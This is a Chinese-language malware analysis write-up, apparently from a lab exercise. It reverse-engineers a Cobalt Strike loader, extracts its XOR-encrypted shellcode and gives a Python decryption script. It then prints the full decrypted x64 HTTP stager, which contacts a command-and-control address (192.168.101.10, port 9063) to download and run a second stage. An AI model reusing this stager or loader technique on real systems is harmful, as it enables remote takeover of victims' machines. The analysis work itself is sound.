当前位置: 首页 > news >正文

记一次病毒分析

news 2025/10/11 6:27:28

主要参考

https://oceanzbz.github.io/2025/04/04/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/cyberstrikelab/CERT-1/

0x1.微步查询

放微步查询是cs马,但是静态检测没有返还ip值

0x2.逆向分析

CS生成的exe其实是一个loder,也就是加载器,加载器加载里面的shellcode来运行主要功能,所以我们进行逆向分析的时候主要找加载器中的shellcode

查壳,无壳,发现是64位

跟进到这个函数中

继续跟进到401955里面

先获取系统时间戳,然后拼接字符串和创建线程通过管道读取shellcode,然后执行,跟到sub_401902中

先申请内存然后sleep,然后跟到sub_401862

看到读取shellcode操作在返回去看sub_40174A

这里大概就是解密的操作,然后找到shellcode解密一下就行了

提取出来

 0x93, 0x4F, 0x40, 0xF0, 0x9F, 0xEF, 0x0B, 0x14, 0x6F, 0x07, 0x82, 0x45, 0x2E, 0x57, 0x91, 0x45, 0x39, 0x4F, 0xF2, 0xC6, 0x0A, 0x4F, 0x48, 0x46, 0x0F, 0x4F, 0x48, 0x46, 0x77, 0x4F, 0x48, 0x46, 0x4F, 0x4F, 0x48, 0x66, 0x3F, 0x4F, 0xCC, 0xA3, 0x25, 0x4D, 0x8E, 0x25, 0xA6, 0x4F, 0xF2, 0xD4, 0xC3, 0x3B, 0xA2, 0x68, 0x6D, 0x2B, 0xE3, 0x55, 0xAE, 0xCE, 0xCE, 0x55, 0x6E, 0xC6, 0x21, 0xF9, 0x3D, 0x46, 0x92, 0x5C, 0xE4, 0x55, 0xE3, 0x9F, 0x2D, 0x3B, 0x8B, 0x15, 0xBF, 0x61, 0x42, 0x6C, 0x77, 0x0C, 0xC1, 0x61, 0x1D, 0x8C, 0x43, 0x9C, 0x6F, 0x07, 0xC3, 0x5C, 0xEA, 0xC7, 0xB7, 0x73, 0x27, 0x06, 0x13, 0x44, 0xE4, 0x4F, 0xDB, 0x50, 0xE4, 0x47, 0xE3, 0x5D, 0x6E, 0xD7, 0x20, 0x42, 0x27, 0xF8, 0x0A, 0x55, 0xE4, 0x33, 0x4B, 0x5C, 0x6E, 0xD1, 0x8E, 0x25, 0xA6, 0x4F, 0xF2, 0xD4, 0xC3, 0x46, 0x02, 0xDD, 0x62, 0x46, 0xC2, 0xD5, 0x57, 0xE7, 0xB6, 0xE5, 0x23, 0x04, 0x8F, 0x30, 0x67, 0x42, 0xFA, 0xC5, 0x1A, 0xDF, 0x9B, 0x50, 0xE4, 0x47, 0xE7, 0x5D, 0x6E, 0xD7, 0xA5, 0x55, 0xE4, 0x0B, 0x8B, 0x50, 0xE4, 0x47, 0xDF, 0x5D, 0x6E, 0xD7, 0x82, 0x9F, 0x6B, 0x8F, 0x8B, 0x15, 0xBF, 0x46, 0x9B, 0x55, 0x37, 0x59, 0x9A, 0x4E, 0x2E, 0x5F, 0x82, 0x4D, 0x2E, 0x5D, 0x8B, 0x97, 0x83, 0x27, 0x82, 0x46, 0x90, 0xE7, 0x9B, 0x55, 0x36, 0x5D, 0x8B, 0x9F, 0x7D, 0xEE, 0x8C, 0xEB, 0x90, 0xF8, 0x9E, 0x7E, 0x6F, 0x4E, 0x7D, 0x63, 0x06, 0x69, 0xAA, 0x7A, 0x0A, 0x73, 0xC3, 0x55, 0x39, 0x4E, 0x4A, 0xF2, 0x23, 0x8E, 0x32, 0x55, 0xD5, 0x4B, 0xB4, 0x32, 0x68, 0xF8, 0x16, 0x5C, 0x5E, 0xCE, 0x8B, 0x25, 0xBD, 0x4A, 0xF2, 0xD4, 0x22, 0x36, 0x0A, 0x55, 0x3F, 0x46, 0x93, 0x55, 0xD5, 0x3D, 0x95, 0x6D, 0xC8, 0xF8, 0x16, 0xFD, 0xFC, 0x07, 0xC3, 0x14, 0x35, 0x4F, 0x4A, 0xD5, 0x2E, 0xBF, 0xA4, 0x37, 0x6F, 0x07, 0x8E, 0x25, 0xA6, 0x46, 0x92, 0x55, 0x3E, 0x6D, 0xC0, 0x55, 0x3E, 0x46, 0x79, 0x43, 0xE6, 0x98, 0x05, 0xEB, 0xBA, 0xEC, 0xBA, 0x4F, 0x27, 0x8E, 0x02, 0x5C, 0x5E, 0xD5, 0x8A, 0x9D, 0xB7, 0x4A, 0xF2, 0xDD, 0x3D, 0x6F, 0xC3, 0x26, 0xAF, 0x83, 0x91, 0x46, 0x2E, 0xBD, 0x28, 0x41, 0x41, 0x3C, 0x3C, 0xC1, 0x27, 0x8E, 0x05, 0x5C, 0xEC, 0xC4, 0x93, 0x7E, 0x65, 0x58, 0x8B, 0x9D, 0x9E, 0xBD, 0xDC, 0x14, 0x6F, 0x07, 0xA9, 0x14, 0x07, 0x87, 0xF0, 0x14, 0x6F, 0x4E, 0x4A, 0xF4, 0x2E, 0xBE, 0xC7, 0x14, 0x6F, 0x07, 0x82, 0xAE, 0x1A, 0x41, 0x5D, 0x92, 0x90, 0xD2, 0x8B, 0x9D, 0x9E, 0x4F, 0x4A, 0xCE, 0x26, 0xC0, 0x03, 0xEB, 0x90, 0xF8, 0x3C, 0x59, 0x5E, 0xCE, 0x91, 0x46, 0x2E, 0xBD, 0xEE, 0x12, 0x77, 0x7C, 0x3C, 0xC1, 0xEA, 0xC7, 0xCC, 0x91, 0xF2, 0x06, 0xC3, 0x14, 0x27, 0xF8, 0x0C, 0x1B, 0xEB, 0x8B, 0xC2, 0x14, 0x6F, 0xEC, 0x70, 0xFD, 0x8B, 0x06, 0xC3, 0x14, 0x87, 0x85, 0x3C, 0xEB, 0x90, 0x28, 0x94, 0x6D, 0x25, 0x44, 0xC3, 0x36, 0x7E, 0x22, 0xFC, 0x4C, 0x50, 0x58, 0x72, 0x93, 0xB5, 0x7D, 0x90, 0x4F, 0x71, 0xB1, 0x40, 0x73, 0xFA, 0xF9, 0x45, 0xC9, 0xC1, 0x9F, 0x7E, 0x22, 0x1B, 0x23, 0x05, 0x7A, 0x15, 0x7B, 0xDF, 0x99, 0x1B, 0xBC, 0x22, 0x3E, 0x02, 0xF2, 0x16, 0xDC, 0xA5, 0x56, 0xCC, 0xEC, 0xA1, 0x7F, 0xD7, 0xBD, 0x32, 0xF2, 0x18, 0x42, 0x9C, 0xC4, 0x09, 0xCA, 0x14, 0x04, 0xE6, 0x0D, 0x2A, 0xEC, 0x71, 0xB6, 0xB7, 0x7F, 0x48, 0x35, 0x86, 0x54, 0x1A, 0xBE, 0x6F, 0x52, 0xB0, 0x71, 0x1D, 0x2A, 0x82, 0x73, 0x0A, 0x69, 0xB7, 0x2E, 0x4F, 0x4A, 0xAC, 0x6E, 0x06, 0x6B, 0xAF, 0x75, 0x40, 0x32, 0xED, 0x24, 0x4F, 0x2F, 0xA0, 0x7B, 0x02, 0x77, 0xA2, 0x60, 0x06, 0x65, 0xAF, 0x71, 0x54, 0x27, 0x8E, 0x47, 0x26, 0x42, 0xE3, 0x25, 0x5F, 0x29, 0xF3, 0x2F, 0x4F, 0x50, 0xAA, 0x7A, 0x0B, 0x68, 0xB4, 0x67, 0x4F, 0x49, 0x97, 0x34, 0x59, 0x29, 0xF1, 0x2F, 0x4F, 0x50, 0xAA, 0x7A, 0x59, 0x33, 0xF8, 0x34, 0x17, 0x31, 0xF7, 0x2F, 0x4F, 0x53, 0xB1, 0x7D, 0x0B, 0x62, 0xAD, 0x60, 0x40, 0x31, 0xED, 0x24, 0x46, 0x0A, 0xC9, 0x14, 0xD7, 0x79, 0xFC, 0xD3, 0x80, 0xB9, 0x0E, 0x43, 0x6E, 0xE9, 0x5B, 0x0E, 0x0F, 0x04, 0x60, 0x0F, 0x80, 0xF1, 0x50, 0x10, 0xF0, 0x39, 0x3A, 0xB8, 0x35, 0xC8, 0xA2, 0x2C, 0x40, 0xB1, 0xAF, 0x96, 0xE1, 0xB1, 0x59, 0xD6, 0xF1, 0x69, 0x53, 0x29, 0x9C, 0x04, 0x16, 0x5C, 0x5F, 0x26, 0x7F, 0x73, 0x70, 0x6C, 0x56, 0xCF, 0xD0, 0x78, 0x6E, 0x3A, 0xDB, 0xC5, 0x6A, 0x03, 0x0A, 0xDC, 0x82, 0xB9, 0x3B, 0x21, 0xC4, 0x73, 0x9D, 0xB6, 0xF2, 0x5D, 0x1C, 0xB3, 0x08, 0x16, 0xCF, 0xE5, 0xB8, 0x23, 0x3A, 0x76, 0xEE, 0xBC, 0xAB, 0xF5, 0xD7, 0x7D, 0x9A, 0xD5, 0x9C, 0xFE, 0x2F, 0xC7, 0x30, 0x0F, 0xB1, 0x4D, 0x04, 0xF5, 0x6B, 0x8F, 0x4B, 0xC3, 0x35, 0x3A, 0x7A, 0x4B, 0x3C, 0x67, 0x13, 0xE1, 0x4B, 0x80, 0xB6, 0x7C, 0xD3, 0x03, 0x3B, 0xB7, 0xFE, 0xFC, 0xD2, 0xCE, 0x72, 0x60, 0xEF, 0xAD, 0x43, 0xCA, 0x0F, 0xED, 0x8D, 0xFC, 0x5D, 0x5B, 0xFC, 0xF4, 0xFE, 0xA6, 0x5F, 0x81, 0x78, 0x98, 0x38, 0x55, 0x04, 0x4B, 0x95, 0x84, 0xBF, 0x86, 0x59, 0xDD, 0x45, 0xD0, 0xAB, 0x77, 0x9D, 0xE6, 0xF6, 0xE3, 0x16, 0x33, 0x98, 0x20, 0xF6, 0x48, 0xEB, 0x2F, 0xD4, 0xD3, 0xDA, 0x26, 0x94, 0x1D, 0xAE, 0x26, 0x3D, 0xA3, 0x33, 0x1E, 0x87, 0x94, 0x2A, 0x04, 0x8D, 0x1C, 0x4D, 0x5A, 0xDE, 0x56, 0xC8, 0x94, 0x62, 0x5E, 0x6B, 0x23, 0x1D, 0x1F, 0xB7, 0x7A, 0x16, 0xAB, 0xBD, 0x66, 0xF8, 0x29, 0x21, 0xFD, 0xB3, 0xC1, 0x6F, 0x46, 0x7D, 0xE4, 0xDA, 0xA5, 0x95, 0xEB, 0xBA, 0x4F, 0xF2, 0xDD, 0xD5, 0x07, 0xC3, 0x54, 0x6F, 0x46, 0x7B, 0x14, 0x7F, 0x07, 0xC3, 0x55, 0xD6, 0x47, 0xC3, 0x14, 0x6F, 0x46, 0x79, 0x4C, 0xCB, 0x54, 0x26, 0xEB, 0xBA, 0x4F, 0x50, 0x47, 0x3C, 0x4F, 0x4A, 0xF3, 0x27, 0x8E, 0x32, 0x5C, 0xE6, 0xDD, 0x82, 0xAC, 0x6F, 0x27, 0xC3, 0x14, 0x26, 0x8E, 0x3A, 0x55, 0xD5, 0x15, 0x55, 0x9D, 0x8D, 0xF8, 0x16, 0x5C, 0xEC, 0xC3, 0xE3, 0x91, 0xAF, 0x73, 0x75, 0x72, 0xE4, 0x00, 0x8B, 0x15, 0xAC, 0x82, 0x03, 0x61, 0xB8, 0x5F, 0x9B, 0x4C, 0x27, 0x02, 0xC3, 0x14, 0x6F, 0x07, 0x93, 0xD7, 0x87, 0x78, 0x3E, 0xEB, 0x90, 0x36, 0xFA, 0x26, 0x41, 0x36, 0xF5, 0x2C, 0x41, 0x36, 0xF3, 0x25, 0x41, 0x36, 0xF3, 0x14, 0x6F, 0x06, 0x45, 0xB4

然后写一个脚本

s = [0x93, 0x4F, 0x40, 0xF0, 0x9F, 0xEF, 0x0B, 0x14, 0x6F, 0x07, 0x82, 0x45, 0x2E, 0x57, 0x91, 0x45, 0x39, 0x4F, 0xF2, 0xC6, 0x0A, 0x4F, 0x48, 0x46, 0x0F, 0x4F, 0x48, 0x46, 0x77, 0x4F, 0x48, 0x46, 0x4F, 0x4F, 0x48, 0x66, 0x3F, 0x4F, 0xCC, 0xA3, 0x25, 0x4D, 0x8E, 0x25, 0xA6, 0x4F, 0xF2, 0xD4, 0xC3, 0x3B, 0xA2, 0x68, 0x6D, 0x2B, 0xE3, 0x55, 0xAE, 0xCE, 0xCE, 0x55, 0x6E, 0xC6, 0x21, 0xF9, 0x3D, 0x46, 0x92, 0x5C, 0xE4, 0x55, 0xE3, 0x9F, 0x2D, 0x3B, 0x8B, 0x15, 0xBF, 0x61, 0x42, 0x6C, 0x77, 0x0C, 0xC1, 0x61, 0x1D, 0x8C, 0x43, 0x9C, 0x6F, 0x07, 0xC3, 0x5C, 0xEA, 0xC7, 0xB7, 0x73, 0x27, 0x06, 0x13, 0x44, 0xE4, 0x4F, 0xDB, 0x50, 0xE4, 0x47, 0xE3, 0x5D, 0x6E, 0xD7, 0x20, 0x42, 0x27, 0xF8, 0x0A, 0x55, 0xE4, 0x33, 0x4B, 0x5C, 0x6E, 0xD1, 0x8E, 0x25, 0xA6, 0x4F, 0xF2, 0xD4, 0xC3, 0x46, 0x02, 0xDD, 0x62, 0x46, 0xC2, 0xD5, 0x57, 0xE7, 0xB6, 0xE5, 0x23, 0x04, 0x8F, 0x30, 0x67, 0x42, 0xFA, 0xC5, 0x1A, 0xDF, 0x9B, 0x50, 0xE4, 0x47, 0xE7, 0x5D, 0x6E, 0xD7, 0xA5, 0x55, 0xE4, 0x0B, 0x8B, 0x50, 0xE4, 0x47, 0xDF, 0x5D, 0x6E, 0xD7, 0x82, 0x9F, 0x6B, 0x8F, 0x8B, 0x15, 0xBF, 0x46, 0x9B, 0x55, 0x37, 0x59, 0x9A, 0x4E, 0x2E, 0x5F, 0x82, 0x4D, 0x2E, 0x5D, 0x8B, 0x97, 0x83, 0x27, 0x82, 0x46, 0x90, 0xE7, 0x9B, 0x55, 0x36, 0x5D, 0x8B, 0x9F, 0x7D, 0xEE, 0x8C, 0xEB, 0x90, 0xF8, 0x9E, 0x7E, 0x6F, 0x4E, 0x7D, 0x63, 0x06, 0x69, 0xAA, 0x7A, 0x0A, 0x73, 0xC3, 0x55, 0x39, 0x4E, 0x4A, 0xF2, 0x23, 0x8E, 0x32, 0x55, 0xD5, 0x4B, 0xB4, 0x32, 0x68, 0xF8, 0x16, 0x5C, 0x5E, 0xCE, 0x8B, 0x25, 0xBD, 0x4A, 0xF2, 0xD4, 0x22, 0x36, 0x0A, 0x55, 0x3F, 0x46, 0x93, 0x55, 0xD5, 0x3D, 0x95, 0x6D, 0xC8, 0xF8, 0x16, 0xFD, 0xFC, 0x07, 0xC3, 0x14, 0x35, 0x4F, 0x4A, 0xD5, 0x2E, 0xBF, 0xA4, 0x37, 0x6F, 0x07, 0x8E, 0x25, 0xA6, 0x46, 0x92, 0x55, 0x3E, 0x6D, 0xC0, 0x55, 0x3E, 0x46, 0x79, 0x43, 0xE6, 0x98, 0x05, 0xEB, 0xBA, 0xEC, 0xBA, 0x4F, 0x27, 0x8E, 0x02, 0x5C, 0x5E, 0xD5, 0x8A, 0x9D, 0xB7, 0x4A, 0xF2, 0xDD, 0x3D, 0x6F, 0xC3, 0x26, 0xAF, 0x83, 0x91, 0x46, 0x2E, 0xBD, 0x28, 0x41, 0x41, 0x3C, 0x3C, 0xC1, 0x27, 0x8E, 0x05, 0x5C, 0xEC, 0xC4, 0x93, 0x7E, 0x65, 0x58, 0x8B, 0x9D, 0x9E, 0xBD, 0xDC, 0x14, 0x6F, 0x07, 0xA9, 0x14, 0x07, 0x87, 0xF0, 0x14, 0x6F, 0x4E, 0x4A, 0xF4, 0x2E, 0xBE, 0xC7, 0x14, 0x6F, 0x07, 0x82, 0xAE, 0x1A, 0x41, 0x5D, 0x92, 0x90, 0xD2, 0x8B, 0x9D, 0x9E, 0x4F, 0x4A, 0xCE, 0x26, 0xC0, 0x03, 0xEB, 0x90, 0xF8, 0x3C, 0x59, 0x5E, 0xCE, 0x91, 0x46, 0x2E, 0xBD, 0xEE, 0x12, 0x77, 0x7C, 0x3C, 0xC1, 0xEA, 0xC7, 0xCC, 0x91, 0xF2, 0x06, 0xC3, 0x14, 0x27, 0xF8, 0x0C, 0x1B, 0xEB, 0x8B, 0xC2, 0x14, 0x6F, 0xEC, 0x70, 0xFD, 0x8B, 0x06, 0xC3, 0x14, 0x87, 0x85, 0x3C, 0xEB, 0x90, 0x28, 0x94, 0x6D, 0x25, 0x44, 0xC3, 0x36, 0x7E, 0x22, 0xFC, 0x4C, 0x50, 0x58, 0x72, 0x93, 0xB5, 0x7D, 0x90, 0x4F, 0x71, 0xB1, 0x40, 0x73, 0xFA, 0xF9, 0x45, 0xC9, 0xC1, 0x9F, 0x7E, 0x22, 0x1B, 0x23, 0x05, 0x7A, 0x15, 0x7B, 0xDF, 0x99, 0x1B, 0xBC, 0x22, 0x3E, 0x02, 0xF2, 0x16, 0xDC, 0xA5, 0x56, 0xCC, 0xEC, 0xA1, 0x7F, 0xD7, 0xBD, 0x32, 0xF2, 0x18, 0x42, 0x9C, 0xC4, 0x09, 0xCA, 0x14, 0x04, 0xE6, 0x0D, 0x2A, 0xEC, 0x71, 0xB6, 0xB7, 0x7F, 0x48, 0x35, 0x86, 0x54, 0x1A, 0xBE, 0x6F, 0x52, 0xB0, 0x71, 0x1D, 0x2A, 0x82, 0x73, 0x0A, 0x69, 0xB7, 0x2E, 0x4F, 0x4A, 0xAC, 0x6E, 0x06, 0x6B, 0xAF, 0x75, 0x40, 0x32, 0xED, 0x24, 0x4F, 0x2F, 0xA0, 0x7B, 0x02, 0x77, 0xA2, 0x60, 0x06, 0x65, 0xAF, 0x71, 0x54, 0x27, 0x8E, 0x47, 0x26, 0x42, 0xE3, 0x25, 0x5F, 0x29, 0xF3, 0x2F, 0x4F, 0x50, 0xAA, 0x7A, 0x0B, 0x68, 0xB4, 0x67, 0x4F, 0x49, 0x97, 0x34, 0x59, 0x29, 0xF1, 0x2F, 0x4F, 0x50, 0xAA, 0x7A, 0x59, 0x33, 0xF8, 0x34, 0x17, 0x31, 0xF7, 0x2F, 0x4F, 0x53, 0xB1, 0x7D, 0x0B, 0x62, 0xAD, 0x60, 0x40, 0x31, 0xED, 0x24, 0x46, 0x0A, 0xC9, 0x14, 0xD7, 0x79, 0xFC, 0xD3, 0x80, 0xB9, 0x0E, 0x43, 0x6E, 0xE9, 0x5B, 0x0E, 0x0F, 0x04, 0x60, 0x0F, 0x80, 0xF1, 0x50, 0x10, 0xF0, 0x39, 0x3A, 0xB8, 0x35, 0xC8, 0xA2, 0x2C, 0x40, 0xB1, 0xAF, 0x96, 0xE1, 0xB1, 0x59, 0xD6, 0xF1, 0x69, 0x53, 0x29, 0x9C, 0x04, 0x16, 0x5C, 0x5F, 0x26, 0x7F, 0x73, 0x70, 0x6C, 0x56, 0xCF, 0xD0, 0x78, 0x6E, 0x3A, 0xDB, 0xC5, 0x6A, 0x03, 0x0A, 0xDC, 0x82, 0xB9, 0x3B, 0x21, 0xC4, 0x73, 0x9D, 0xB6, 0xF2, 0x5D, 0x1C, 0xB3, 0x08, 0x16, 0xCF, 0xE5, 0xB8, 0x23, 0x3A, 0x76, 0xEE, 0xBC, 0xAB, 0xF5, 0xD7, 0x7D, 0x9A, 0xD5, 0x9C, 0xFE, 0x2F, 0xC7, 0x30, 0x0F, 0xB1, 0x4D, 0x04, 0xF5, 0x6B, 0x8F, 0x4B, 0xC3, 0x35, 0x3A, 0x7A, 0x4B, 0x3C, 0x67, 0x13, 0xE1, 0x4B, 0x80, 0xB6, 0x7C, 0xD3, 0x03, 0x3B, 0xB7, 0xFE, 0xFC, 0xD2, 0xCE, 0x72, 0x60, 0xEF, 0xAD, 0x43, 0xCA, 0x0F, 0xED, 0x8D, 0xFC, 0x5D, 0x5B, 0xFC, 0xF4, 0xFE, 0xA6, 0x5F, 0x81, 0x78, 0x98, 0x38, 0x55, 0x04, 0x4B, 0x95, 0x84, 0xBF, 0x86, 0x59, 0xDD, 0x45, 0xD0, 0xAB, 0x77, 0x9D, 0xE6, 0xF6, 0xE3, 0x16, 0x33, 0x98, 0x20, 0xF6, 0x48, 0xEB, 0x2F, 0xD4, 0xD3, 0xDA, 0x26, 0x94, 0x1D, 0xAE, 0x26, 0x3D, 0xA3, 0x33, 0x1E, 0x87, 0x94, 0x2A, 0x04, 0x8D, 0x1C, 0x4D, 0x5A, 0xDE, 0x56, 0xC8, 0x94, 0x62, 0x5E, 0x6B, 0x23, 0x1D, 0x1F, 0xB7, 0x7A, 0x16, 0xAB, 0xBD, 0x66, 0xF8, 0x29, 0x21, 0xFD, 0xB3, 0xC1, 0x6F, 0x46, 0x7D, 0xE4, 0xDA, 0xA5, 0x95, 0xEB, 0xBA, 0x4F, 0xF2, 0xDD, 0xD5, 0x07, 0xC3, 0x54, 0x6F, 0x46, 0x7B, 0x14, 0x7F, 0x07, 0xC3, 0x55, 0xD6, 0x47, 0xC3, 0x14, 0x6F, 0x46, 0x79, 0x4C, 0xCB, 0x54, 0x26, 0xEB, 0xBA, 0x4F, 0x50, 0x47, 0x3C, 0x4F, 0x4A, 0xF3, 0x27, 0x8E, 0x32, 0x5C, 0xE6, 0xDD, 0x82, 0xAC, 0x6F, 0x27, 0xC3, 0x14, 0x26, 0x8E, 0x3A, 0x55, 0xD5, 0x15, 0x55, 0x9D, 0x8D, 0xF8, 0x16, 0x5C, 0xEC, 0xC3, 0xE3, 0x91, 0xAF, 0x73, 0x75, 0x72, 0xE4, 0x00, 0x8B, 0x15, 0xAC, 0x82, 0x03, 0x61, 0xB8, 0x5F, 0x9B, 0x4C, 0x27, 0x02, 0xC3, 0x14, 0x6F, 0x07, 0x93, 0xD7, 0x87, 0x78, 0x3E, 0xEB, 0x90, 0x36, 0xFA, 0x26, 0x41, 0x36, 0xF5, 0x2C, 0x41, 0x36, 0xF3, 0x25, 0x41, 0x36, 0xF3, 0x14, 0x6F, 0x06, 0x45, 0xB4]
key = [0x6F, 0x07, 0xC3,0x14]
for i in range(len(s)):
s[i] ^= key[i & 3]
print(s)
for i in s:
print(hex(i),end = ',')

然后再转一遍ascill码或者放到ai里

这是ai的结果

脚本

a = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0x75,0x72,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x0,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x0,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xe9,0x93,0x0,0x0,0x0,0x5a,0x48,0x89,0xc1,0x41,0xb8,0x67,0x23,0x0,0x0,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x3,0x41,0x51,0x41,0xba,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x79,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x0,0x32,0xc0,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0xa,0x5f,0x48,0x89,0xf1,0xba,0x1f,0x0,0x0,0x0,0x6a,0x0,0x68,0x80,0x33,0x0,0x0,0x49,0x89,0xe0,0x41,0xb9,0x4,0x0,0x0,0x0,0x41,0xba,0x75,0x46,0x9e,0x86,0xff,0xd5,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0xf,0x85,0x9d,0x1,0x0,0x0,0x48,0xff,0xcf,0xf,0x84,0x8c,0x1,0x0,0x0,0xeb,0xb3,0xe9,0xe4,0x1,0x0,0x0,0xe8,0x82,0xff,0xff,0xff,0x2f,0x57,0x79,0x4a,0x43,0x0,0x22,0x11,0x25,0x3f,0x58,0x3f,0x5f,0xb1,0x87,0xda,0x7a,0x53,0x5b,0x1e,0xb6,0x83,0x67,0x95,0xfe,0x86,0xdd,0xae,0x98,0xbd,0x36,0x74,0x24,0xc6,0x6e,0x7a,0x7c,0x1c,0x8d,0x74,0xbb,0xe1,0x2a,0x6d,0xf5,0xd5,0xc8,0xca,0x51,0xf,0xf8,0xce,0x78,0x14,0xa9,0x5d,0xf5,0xdb,0x56,0xf3,0xc3,0xca,0xde,0x7b,0x3,0x25,0x19,0x45,0xeb,0xb2,0xa2,0xd8,0x78,0x8b,0x21,0xe9,0x53,0xd9,0xaa,0x0,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x31,0x30,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x32,0x3b,0x20,0x57,0x69,0x6e,0x36,0x34,0x3b,0x20,0x78,0x36,0x34,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x36,0x2e,0x30,0x29,0xd,0xa,0x0,0xb8,0x7e,0x3f,0xc7,0xef,0xbe,0xcd,0x57,0x1,0xee,0x98,0x1a,0x60,0x3,0xa3,0x1b,0xef,0xf6,0x93,0x4,0x9f,0x3e,0xf9,0xac,0x5a,0xcf,0x61,0x38,0x2f,0xb6,0x6c,0x82,0x8e,0xb6,0x9a,0xc2,0x9e,0x6e,0x90,0x3d,0xf3,0x3,0xd5,0x48,0x30,0x21,0xbc,0x67,0x1f,0x6b,0x95,0xdb,0xbf,0x7f,0xad,0x2e,0xb4,0xc2,0xa9,0x17,0x65,0xdb,0x41,0xad,0x54,0x26,0x7,0x67,0xf2,0xb1,0x31,0x49,0x73,0xb4,0xcb,0x2,0xa0,0xe2,0x7b,0x37,0x55,0x71,0x2d,0xa8,0xc4,0xf2,0x14,0x69,0xf5,0xd2,0x5f,0xea,0x40,0xc0,0xf3,0x1b,0xde,0x4a,0xc7,0xe1,0x4,0x88,0x88,0xd7,0x5a,0x3d,0xb9,0x5f,0x53,0x60,0xd0,0xf5,0x24,0x87,0x75,0x68,0xbc,0x4,0xf8,0xa3,0x91,0xfb,0x11,0xda,0x1d,0x67,0x2c,0xb9,0x2c,0xcd,0xcc,0xf9,0xe2,0xfb,0x9e,0x4f,0x93,0xf3,0x3d,0xb2,0x30,0x86,0xbb,0x8c,0x57,0x52,0xc7,0x5f,0xfa,0x83,0x7c,0x92,0x36,0xda,0x86,0xc4,0xc4,0x70,0x5e,0xf2,0x99,0xe4,0xd5,0x27,0xf7,0x27,0x35,0x5c,0x84,0x28,0x17,0xc7,0xb5,0x21,0x57,0x9,0xc1,0x21,0xfe,0xb7,0x5c,0x19,0x44,0x80,0x45,0x3,0x4e,0x8,0x22,0x5d,0x1d,0x42,0xa7,0x93,0xa1,0x4a,0x4,0x24,0xde,0xb,0xd8,0x7d,0xd5,0xbf,0xd2,0x61,0x3b,0x3d,0x4e,0xfa,0x70,0xd5,0x0,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x0,0x0,0x40,0x0,0x41,0xb8,0x0,0x10,0x0,0x0,0x41,0xb9,0x40,0x0,0x0,0x0,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x0,0x20,0x0,0x0,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x7,0x48,0x1,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x5,0x0,0x0,0x0,0x0,0x50,0xc3,0xe8,0x7f,0xfd,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x30,0x31,0x2e,0x31,0x30,0x0,0x0,0x1,0x86,0xa0]
b = ''
for i in range(len(a)):b+=chr(int(a[i]))
